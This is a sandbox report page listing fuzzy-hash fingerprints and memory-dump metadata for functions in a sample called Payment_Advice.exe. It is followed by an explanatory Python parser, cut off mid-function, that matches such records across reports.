                                                                                                    • Opcode ID: 2e978898042d992720a75b57fb336348bde19e4c3ad9b7aef0d4c00a14923d2f
                                                                                                    • Instruction ID: 231de9c3d1652dbd1a7587934448ead071ae86ab94df8b2256e262e98d958846
                                                                                                    • Opcode Fuzzy Hash: 2e978898042d992720a75b57fb336348bde19e4c3ad9b7aef0d4c00a14923d2f
                                                                                                    • Instruction Fuzzy Hash: 905180B19006199FEB24CF58E9867EEBBF4FB58354F24853AD411EB390D3749944CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0050B16B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Version
                                                                                                    • String ID:
                                                                                                    • API String ID: 1889659487-0
                                                                                                    • Opcode ID: 3b92c2ad8302f51a15b8bd13cce22db515b396fb29ad0fd6834c3450f8ce53c9
                                                                                                    • Instruction ID: 3382780d0a5856ff06861cc84ead4ad3b5ce7b81f74d008c8e5e96cb2d5e217e
                                                                                                    • Opcode Fuzzy Hash: 3b92c2ad8302f51a15b8bd13cce22db515b396fb29ad0fd6834c3450f8ce53c9
                                                                                                    • Instruction Fuzzy Hash: 76F03AB8E006088FDB28CB18ED9A6D977F1FBA9359F104295D51993390C3B0A9C8DF64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 0-4203073231
                                                                                                    • Opcode ID: bcc56bf6068f5c2fd5f385ece35ef7d576f0538485a91f732819961c9dfd73b7
                                                                                                    • Instruction ID: 8ce939f313efb74e73aeb4c52d9c1b46a56fe94784fe1b47f342b412dc36ea50
                                                                                                    • Opcode Fuzzy Hash: bcc56bf6068f5c2fd5f385ece35ef7d576f0538485a91f732819961c9dfd73b7
                                                                                                    • Instruction Fuzzy Hash: BDC127B6A183418FC354CF2AD88065AFBE1BFC8308F19892DE998D7311D734E955CB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0051F3A5), ref: 0051F9DA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: 7e545dac1ebb2faf2b48f8968936b0fd0ab60337a693bb58f6f369ca2c9f46f8
                                                                                                    • Instruction ID: bdc7777680aceb967434e2ba55de9dea00fe24684ecc62a35b5ef08402485eb4
                                                                                                    • Opcode Fuzzy Hash: 7e545dac1ebb2faf2b48f8968936b0fd0ab60337a693bb58f6f369ca2c9f46f8
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 54951025-0
                                                                                                    • Opcode ID: 359cc51e40981e80979e34cef1b31dddd9ae9795d8c0d6959930e7266df1215b
                                                                                                    • Instruction ID: 977f118b96727179866e7f842200ff29eb7b18019d9b3a2d2272e238bb36abc6
                                                                                                    • Opcode Fuzzy Hash: 359cc51e40981e80979e34cef1b31dddd9ae9795d8c0d6959930e7266df1215b
                                                                                                    • Instruction Fuzzy Hash: 22A011302022008BC3008F38AE082083AA8AA20282B08002AA008C2220EAA080A8FB00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                                                    • Instruction ID: 48fd3b5b738bcf3e0ff4af3b637819156058e4c42ce91aa3f7f62c0c6cc0e5d2
                                                                                                    • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                                                    • Instruction Fuzzy Hash: 0562DF716047859FDB25CF28C8906F9BFE1BF95304F08896DE8AA8B342D730E985CB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                                                                    • Instruction ID: efce6c40ceaf442b8eb76e5752340f72ae75ed26b27b5415d38b13f46d7dd350
                                                                                                    • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                                                                    • Instruction Fuzzy Hash: FB62A1716083499FDB15CF2CC8809B9BFF1BF99304F18896DE89A8B346D630E985CB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                                                                    • Instruction ID: 47630a132885c1f7c5192660667277210b57bade1b528d3a367532f2a9dcbc05
                                                                                                    • Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                                                                    • Instruction Fuzzy Hash: 06524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 20bf4cef5cef176c49850f8131e28f5ed4baf0b9d3ea7ca0cad3fa9fadd44204
                                                                                                    • Instruction ID: 3aef52d4e0c8f199732084ad6417ce4ed1c9a0b28c64a686510853ac097f11aa
                                                                                                    • Opcode Fuzzy Hash: 20bf4cef5cef176c49850f8131e28f5ed4baf0b9d3ea7ca0cad3fa9fadd44204
                                                                                                    • Instruction Fuzzy Hash: C412C3B160870A9FD718CF2CC494AB9BBF1FF98304F14892DE996C7681D334A995CB45
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3a8abe1862ccffab01e24c7c57877abc7046e480e245a5e07e6a8200ae0f98cd
                                                                                                    • Instruction ID: 3dcca2ac8fc2aeb364c1a919bd07ac562e19de08c861fbe3e69a58f17f37e70f
                                                                                                    • Opcode Fuzzy Hash: 3a8abe1862ccffab01e24c7c57877abc7046e480e245a5e07e6a8200ae0f98cd
                                                                                                    • Instruction Fuzzy Hash: 9CF17771A083158FC728CF28C58862EBFE5FFCA314F254B2EF48597296D631E9458B46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4a5abdab17420c5a85c4c1e100ecd13286d468e1db2eb3f94771506c5e93e242
                                                                                                    • Instruction ID: af397b0d1a09f7935dcf3e8cfcced3fa09cf68dca08f0ced1f3d9bb87a607a1b
                                                                                                    • Opcode Fuzzy Hash: 4a5abdab17420c5a85c4c1e100ecd13286d468e1db2eb3f94771506c5e93e242
                                                                                                    • Instruction Fuzzy Hash: 30E16C795083948FD314CF29D8909AABFF0BF9A304F45095EF9C497392C235EA19DB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                                                    • Instruction ID: 527e79486eaa20a699bacdb41086c3db33c528b21b67beed496654ddb2c02abb
                                                                                                    • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                                                    • Instruction Fuzzy Hash: 2E9126B12003469BEB24EA64D899BFE7FD5FB91300F100D2DE5A6872C2EA7495C5CB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                    • Instruction ID: 26d1ad14d68e5218b69f0b37636a6f5647343253c67bef2ed476dcf8eb4ed572
                                                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                    • Instruction Fuzzy Hash: D28128713043464BFF24DE68C895BFD7F95BBD1308F045D2DE9868B282DAA489C68B52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d21462af2fb79a1e7d84c93a09bbbcffa25119219e39f00fea21295955b14e96
                                                                                                    • Instruction ID: 18e3ff91e3803a9623c404ee0334cd57c5c0727b03ba86c21ecd9df6adbae1b6
                                                                                                    • Opcode Fuzzy Hash: d21462af2fb79a1e7d84c93a09bbbcffa25119219e39f00fea21295955b14e96
                                                                                                    • Instruction Fuzzy Hash: F0617539600F39A6CF389A6878997BE2B94FF63350F541D19E442DB2C1F2B1DD428651
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                                                    • Instruction ID: 5217ff14c2130534e2a22ab1495831f2106183465b0bf0a1f63b8c177d5e49da
                                                                                                    • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                                                    • Instruction Fuzzy Hash: E6512461200E7556DF385628BA5EBBE2F85BF83300F184819E983CB2C2F635ED45C696
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7034bb8cbdb427f505e738eb21928d64d6686fac1a60660fdd38e2aaf1611f5a
                                                                                                    • Instruction ID: c871431f53792741444f640cc3555f6c08dfc6aed5993e317a0a00f8146d082f
                                                                                                    • Opcode Fuzzy Hash: 7034bb8cbdb427f505e738eb21928d64d6686fac1a60660fdd38e2aaf1611f5a
                                                                                                    • Instruction Fuzzy Hash: 4951D4315083D58EC721CF25C5984AEBFE0BFDA314F4909ADE4D95B683C231DA4ACB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%
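Each entry above is one fingerprint record for a function lifted from the 0x501000 memory dump of Payment_Advice.exe: a 64-hex-digit Opcode ID and Instruction ID, an Opcode Fuzzy Hash and an Instruction Fuzzy Hash, the list of associated memory dumps, and a Uniqueness Score. On this page every record's Opcode ID is identical to its Opcode Fuzzy Hash. The Python below is an added example, not Joe Sandbox or IDA-plugin code, that turns entries in this text layout into records for cross-report matching: it strips the "Download File" link text fused onto the Associated lines, decodes the .sdmp file name, intersects two reports on the Instruction Fuzzy Hash, and flags any record whose Opcode ID and Opcode Fuzzy Hash disagree. The sample input is constructed: two records copied from this page plus a hypothetical second report. The positional meaning given to the .sdmp name fields (process index, dump index, timestamp, base address, page protection) is an assumption about the naming convention; only the PAGE_* protection constants are standard Windows values.

```python
# Parse Joe Sandbox function-fingerprint entries (as extracted to text) into records for
# cross-report matching. Added example; not Joe Sandbox or IDA-plugin code.
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two records copied from this page, then a hypothetical second report.
REPORT_A = """
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• Opcode ID: 7034bb8cbdb427f505e738eb21928d64d6686fac1a60660fdd38e2aaf1611f5a
• Instruction ID: c871431f53792741444f640cc3555f6c08dfc6aed5993e317a0a00f8146d082f
• Opcode Fuzzy Hash: 7034bb8cbdb427f505e738eb21928d64d6686fac1a60660fdd38e2aaf1611f5a
• Instruction Fuzzy Hash: 4951D4315083D58EC721CF25C5984AEBFE0BFDA314F4909ADE4D95B683C231DA4ACB62
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
• Instruction ID: 5217ff14c2130534e2a22ab1495831f2106183465b0bf0a1f63b8c177d5e49da
• Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
• Instruction Fuzzy Hash: E6512461200E7556DF385628BA5EBBE2F85BF83300F184819E983CB2C2F635ED45C696
Uniqueness Score: -1.00%
"""
REPORT_B = """
Memory Dump Source
• Source File: 00000000.00000002.1111111111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 0101010101010101010101010101010101010101010101010101010101010101
• Instruction ID: 0202020202020202020202020202020202020202020202020202020202020202
• Opcode Fuzzy Hash: 0101010101010101010101010101010101010101010101010101010101010101
• Instruction Fuzzy Hash: 4951D4315083D58EC721CF25C5984AEBFE0BFDA314F4909ADE4D95B683C231DA4ACB62
Uniqueness Score: -1.00%
"""
FIELD_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")
SOURCE_RE = re.compile(r"^(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?\d+(?:\.\d+)?)%$")
KEYMAP = {"Opcode ID": "opcode_id", "Instruction ID": "instruction_id",
          "Opcode Fuzzy Hash": "opcode_fuzzy", "Instruction Fuzzy Hash": "instruction_fuzzy"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",  # standard Windows PAGE_* values
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

@dataclass
class FunctionRecord:
    opcode_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy: str = ""
    instruction_fuzzy: str = ""
    source_dump: str = ""
    offset: int = 0
    based_on_pe: bool = False
    associated: list = field(default_factory=list)
    uniqueness: Optional[float] = None

def parse_report(text: str) -> list:
    """One FunctionRecord per 'Memory Dump Source' entry; lines without a known field are skipped."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = FunctionRecord()
            records.append(cur)
        elif cur is None:
            continue
        elif (m := SCORE_RE.match(line)):
            cur.uniqueness = float(m.group(1))
        elif (m := FIELD_RE.match(line)):
            # "Download File" is web link text fused onto the Associated lines; drop it.
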